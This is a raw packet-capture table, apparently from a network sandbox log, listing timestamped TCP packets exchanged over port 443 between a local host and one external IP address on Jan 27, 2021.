Jan 27, 2021 04:10:09.697009087 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697046041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697055101 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697082996 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697094917 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697124004 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697132111 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697138071 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697169065 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697194099 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697205067 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697231054 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697243929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697251081 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697294950 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697312117 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697331905 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697360039 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697370052 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697398901 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697427034 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697433949 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697474957 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697499037 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697523117 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697525978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697563887 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697592020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697601080 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697627068 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697638988 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697662115 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697695971 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697812080 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697850943 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697884083 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697889090 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697901964 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697926998 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697951078 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697962046 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.697978973 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.697999954 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.698029041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.698036909 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.698045015 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.698065042 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.698082924 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.698097944 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.698124886 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.698142052 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.698160887 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.698189974 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.698199034 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.698206902 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.698227882 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.698259115 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.698278904 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.706182003 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.709477901 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.709528923 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.709645033 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.709693909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.714348078 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.714394093 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.714422941 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.714449883 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.714477062 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.714505911 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.714540958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.714538097 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.714566946 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.714576006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.714585066 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.714603901 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.714632988 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.717468977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.717511892 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.717545033 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.717571974 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.717616081 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.717623949 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721087933 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721129894 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721165895 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721183062 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721201897 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721213102 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721237898 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721239090 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721256971 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721285105 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721309900 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721328020 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721357107 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721364975 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721405029 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721427917 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721467018 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721503019 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721540928 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721565008 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721577883 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721615076 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721623898 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721659899 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721661091 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721698999 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721702099 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721738100 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721739054 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721772909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721775055 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721812010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721818924 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721846104 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721852064 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721883059 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721890926 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721920013 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721946001 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.721966028 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.721971035 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722007990 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722042084 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722044945 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722080946 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722081900 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722117901 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722117901 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722152948 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722191095 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722229004 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722249985 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722276926 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722307920 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722318888 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722320080 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722327948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722356081 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722389936 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722392082 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722407103 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722429991 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722455978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722466946 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722480059 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722506046 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722542048 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722544909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722554922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722598076 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722601891 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722647905 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722661018 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722685099 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722697020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722723961 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722735882 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722760916 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722776890 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722807884 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722815990 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722829103 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722852945 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722883940 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722889900 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722901106 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722924948 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722948074 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.722970009 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.722973108 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.723011017 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.723021030 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.723047972 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.723072052 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.723084927 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.723093987 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.723120928 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.723135948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.723156929 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.723167896 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.723193884 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.723205090 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.723229885 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.723239899 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.723275900 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.723278046 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.723329067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.725835085 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727211952 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727262020 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727318048 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727339029 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727365017 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727377892 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727385044 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727402925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727417946 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727443933 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727456093 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727482080 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727488041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727519989 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727530956 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727566957 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727585077 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727607965 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727612972 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727643967 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727649927 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727680922 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727691889 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727718115 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727724075 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727751970 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727757931 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727788925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727794886 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727826118 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727838993 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727870941 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727873087 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727914095 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727916956 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727950096 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727957010 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.727987051 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.727993965 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728024006 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728029013 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728068113 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728080988 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728117943 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728121996 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728152990 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728159904 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728194952 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728199959 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728240967 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728241920 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728276014 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728283882 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728313923 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728319883 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728351116 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728357077 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728385925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728396893 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728423119 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728427887 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728458881 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728471041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728502035 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728506088 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728550911 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728558064 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728595972 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728600979 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728632927 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728638887 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728668928 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728679895 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728703976 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728713989 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728739977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728748083 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728775978 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728784084 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728820086 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728822947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728863955 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728867054 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728899956 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728905916 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728935957 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728948116 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.728972912 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.728977919 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729007959 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729015112 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729044914 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729069948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729083061 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729094028 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729130030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729131937 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729171038 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729177952 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729207039 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729219913 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729243994 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729250908 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729280949 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729285002 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729315996 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729322910 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729352951 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729361057 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729417086 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729433060 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729476929 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729490995 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729520082 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729526043 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729566097 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729569912 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729602098 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729607105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729639053 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729661942 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729670048 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729675055 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729711056 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729721069 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729748011 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729753017 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729785919 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729793072 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729830027 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729831934 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729873896 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.729876041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729918957 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.729969025 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.730005026 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.730015039 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.730041981 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.730055094 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.730077982 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.730088949 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.730119944 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.730123997 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.730165958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.730166912 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.730201960 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.730207920 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.730238914 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.730242968 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.730276108 CET	443	49165	172.67.150.228	192.168.2.22
